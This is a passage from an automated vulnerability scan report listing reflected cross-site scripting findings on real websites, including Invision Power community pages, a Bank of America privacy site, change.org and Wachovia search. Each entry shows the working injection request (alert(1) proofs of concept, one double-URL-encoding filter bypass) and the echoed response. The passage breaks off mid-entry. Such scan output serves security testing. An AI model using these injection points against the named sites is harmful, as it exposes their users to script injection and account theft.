This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e664c7c64f3b4729c92627fef198c533; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' />
...[SNIP]...

3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0226a82b48937e63fc6cf50878e14f6a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:25 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmloYWFibWtVwwUC0GOQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34426

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' />
...[SNIP]...

3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e3d274e04eb68da8518ccc19e454a496; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:39 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNLSwtLSuBVwwVe8GcQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33664

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' />
...[SNIP]...

3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a9bd7f2f7a35acf5a28529ed3969c3d7; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:29 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmloYWFhbWtVwwUEkGPg%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33886

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' />
...[SNIP]...

3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d323303f034c4eef3dca54fb788a70ee; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:13 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNLQwN7SuBVwwVhEGaw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30663

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' />
...[SNIP]...

3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/official.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f58e59b2d0925781bc9226b17dda3b43; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?2e492'><a>093e292e14d=1' />
...[SNIP]...

3.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:09 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism">
...[SNIP]...

3.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:12 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan">
...[SNIP]...

3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "b50aa88426653a094f386591a7682307"
X-Runtime: 771
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=c5b8d93b80d9ed64f7c66ce96c5d235f; domain=.change.org; path=/; HttpOnly
Content-Length: 22463
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...
st","RAILS_ENV":"production","action":"show","page_name":"news-show-27728","controller":"stories"};
_gaq = [["_trackPageview","/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1"]];
//]]>
...[SNIP]...

3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/
Date: Wed, 02 Feb 2011 21:59:59 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
                           v
...[SNIP]...

3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33648
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close


   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1">
...[SNIP]...

3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
   
if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else

...[SNIP]...

3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 22:02:36 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="9c128"><script>alert(1)</script>0f891e45ab3" style="display:none;visibility:hide">
...[SNIP]...

3.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
